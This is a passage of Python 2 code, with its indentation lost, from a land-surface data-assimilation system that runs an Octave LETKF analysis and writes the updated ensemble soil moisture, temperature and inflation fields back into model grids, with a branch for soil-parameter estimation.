Bias_Observation_Model_Option = Bias_Estimation_Option_Obs[Variable_List.index(SensorVariable)]
Bias_Model_Dim = State_DIM_Single_Layer
Bias_Obs_Dim = State_DIM_Single_Layer
Bias_Model_Uniform_STD = numpy.zeros(Bias_Model_Dim)
Bias_Obs_Uniform_STD = numpy.zeros(Bias_Obs_Dim)
Model_Inflation_Uniform_STD = numpy.zeros(nx)
Model_Inflation_Uniform_STD[:] = Model_State_Inflation_Range_STD[Variable_List.index(SensorVariable)]
if PFT_Par_Sens_Dim >= 1 or Soil_Par_Sens_Dim >= 1:
if not numpy.size(Par_Uniform_STD) >= 1:
print "not numpy.size(Par_Uniform_STD) >= 1 !!!!!!!!!!!!!!!!!!!!!!"
os.abort()
############################ BoxCox
minimize_lbfgsb_m = 10
minimize_lbfgsb_iprint = -1
minimize_lbfgsb_factr = 1e1
minimize_lbfgsb_pgtol = 1.0e-5
minimize_lbfgsb_epsilon_in = numpy.asarray([1e-08,1e-08])
try:
xa,innovation,increments,localization_map,bias_a = Call_ReBEL_Octave.ReBEL(gssm_das_octave, letkf, letkf_common, octave,ftype,gssm_name,Gssm_model_tag,nx,ny,nwindow,Ensemble_Number,Num_Local_Obs,eps,Mask[~Mask_Index,:],Obs_Grid,h,B,R,Model_State,E0_SysModel[:,0:Ensemble_Number],E0_ObsModel,
Observation_Corelation_Par,Grid_Resolution_CEA,Grid_Resolution_CEA,bf,alpha_bias, Bias_Forecast_Model_Option, Bias_Observation_Model_Option, msw_infl,parm_infl,Post_Inflation_Alpha,omp_get_num_procs_ParFor,U1,U2,Def_Print,Parameter_Optimization_Flag,
Parameter_Regularization,Par_Uniform_STD,Par_Sens_Dim,State_DIM_Single_Layer,Def_Localization_Temp,Normal_Score_Trans,State_Layer_Num_Single_Column,Bias_Model_Uniform_STD,Bias_Obs_Uniform_STD,Model_Inflation_Uniform_STD,
minimize_lbfgsb_m,minimize_lbfgsb_iprint,minimize_lbfgsb_epsilon_in,minimize_lbfgsb_factr,minimize_lbfgsb_pgtol)
except:
print "**************** User Default Correlation Parameters to Call ReBEL Again!"
Observation_Corelation_Par[0, 0] = 6 # matern Model
Observation_Corelation_Par[1, 0] = 0.0
Observation_Corelation_Par[2, 0] = 1.0
Observation_Corelation_Par[3, 0] = 4.0*Grid_Resolution_CEA
Observation_Corelation_Par[4, 0] = 1.0
xa,innovation,increments,localization_map,bias_a = Call_ReBEL_Octave.ReBEL(gssm_das_octave, letkf, letkf_common, octave,ftype,gssm_name,Gssm_model_tag,nx,ny,nwindow,Ensemble_Number,Num_Local_Obs,eps,Mask[~Mask_Index,:],Obs_Grid,h,B,R,Model_State,E0_SysModel[:,0:Ensemble_Number],E0_ObsModel,
Observation_Corelation_Par,Grid_Resolution_CEA,Grid_Resolution_CEA,bf,alpha_bias, Bias_Forecast_Model_Option, Bias_Observation_Model_Option, msw_infl,parm_infl,Post_Inflation_Alpha,omp_get_num_procs_ParFor,U1,U2,Def_Print,Parameter_Optimization_Flag,
Parameter_Regularization,Par_Uniform_STD,Par_Sens_Dim,State_DIM_Single_Layer,Def_Localization_Temp,Normal_Score_Trans,State_Layer_Num_Single_Column,Bias_Model_Uniform_STD,Bias_Obs_Uniform_STD,Model_Inflation_Uniform_STD,
minimize_lbfgsb_m,minimize_lbfgsb_iprint,minimize_lbfgsb_epsilon_in,minimize_lbfgsb_factr,minimize_lbfgsb_pgtol)
if Def_Print:
print "********************************** Mean Innovation ************************************************"
print "Mean Innovation Value is:",numpy.mean(innovation),"Max Innovation Value is:",numpy.max(innovation),"Min Innovation Value is:",numpy.min(innovation)
print "********************************** Mean Innovation ************************************************"
print "********************************** Mean Increments ************************************************"
print "Mean Increments Value is:",numpy.mean(increments),"Max Increments Value is:",numpy.max(increments),"Min Increments Value is:",numpy.min(increments)
print "********************************** Mean Increments ************************************************"
#print xa[0,:]
#xa,parm_infl = ReBEL(ftype,gssm_name,msw_infl,nx,ny,nwindow,Ensemble_Number,eps,Mask,Obs_Grid,h,R,E0_SysModel,E0_ObsModel,Observation_Corelation_Par,GridSize_Sys,GridSize_Obs,1)
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# State Estimation
# ensemble mean
if (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature") or \
(Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Sensible_Heat"):
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_Ensemble_Mat"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
localization_map_col[i] = localization_map[i]
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+0*State_DIM_Single_Layer):(State_DIM_Single_Layer+(0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+1*State_DIM_Single_Layer):(State_DIM_Single_Layer+(1+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Index+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+2+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_parm_infl"
Analysis_Grid_Col = Analysis_Grid.flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Surface_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+0*State_DIM_Single_Layer):(State_DIM_Single_Layer+(0+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+1*State_DIM_Single_Layer):(State_DIM_Single_Layer+(1+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid.flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Index+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+2+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_Ensemble_Mat"
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_parm_infl"
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid[::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
#print numpy.shape(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:]),numpy.shape(numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1)))
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_Ensemble_Mat"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[Soil_Layer_Index_DA*State_DIM_Single_Layer+i, :])
localization_map_col[i] = localization_map[Soil_Layer_Index_DA*State_DIM_Single_Layer+i]
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(Soil_Layer_Index_DA*State_DIM_Single_Layer):((Soil_Layer_Index_DA+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_parm_infl"
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid[::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
#print numpy.shape(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:]),numpy.shape(numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1)))
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_Ensemble_Mat"
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 2 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_parm_infl"
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid.flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 5 + Soil_Layer_Index + 2 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
else:
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_Ensemble_Mat"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
localization_map_col[i] = localization_map[i]
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[((Soil_Layer_Index+1)*State_DIM_Single_Layer):((Soil_Layer_Index+2)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[0:State_DIM_Single_Layer,Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_parm_infl"
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid[::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[((Soil_Layer_Index+1)*State_DIM_Single_Layer):((Soil_Layer_Index+2)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
#print numpy.shape(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:]),numpy.shape(numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1)))
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_Ensemble_Mat"
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_parm_infl"
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid.flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
else:
if Def_Print:
print "******************************************************** Update Prop_Grid_Array_Sys"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
localization_map_col[i] = localization_map[i]
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[0:State_DIM_Single_Layer,Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update Prop_Grid_Array_Sys_parm_infl"
Analysis_Grid_Col = Analysis_Grid.flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
Prop_Grid_Array_Sys_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
else:
# Parameter Estimation
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
localization_map_col[i] = localization_map[i]
if Soil_Par_Sens_Dim >= 1:
# Assign the Optimized Parameters to Model Input
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par-1):
if Soil_Par_Sens[Par_Index]:
for Ens_Index in range(Ensemble_Number):
xa_temp = xa[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer),Ens_Index]
Analysis_Grid_Col = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa_temp,dtype=numpy.float32)
Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
#Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:] = imadjust.imadjust(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:],numpy.min(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]),numpy.max(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]),Parameter_Min_Max[Par_Index,0],Parameter_Min_Max[Par_Index,1])
parm_infl_temp = parm_infl[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer)]
Analysis_Grid_Col = Parameter_Soil_Space_parm_infl[Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl_temp,dtype=numpy.float32)
Parameter_Soil_Space_parm_infl[Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Par_Index_Sub += 1
if Soil_Par_Sens[Dim_Soil_Par-1]:
xa_temp = xa[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer),Ens_Index]
Analysis_Grid_Col = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa_temp,dtype=numpy.float32)
#print "data_matrix[Min_Index,:]",data_matrix[Min_Index,:]
#print "Low_Tail, High_Tail",Low_Tail, High_Tail, data_matrix[Min_Index,-2]+2
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)))
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
# Soil Boundary Check
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
# Remove the outliers based on the ensemble median
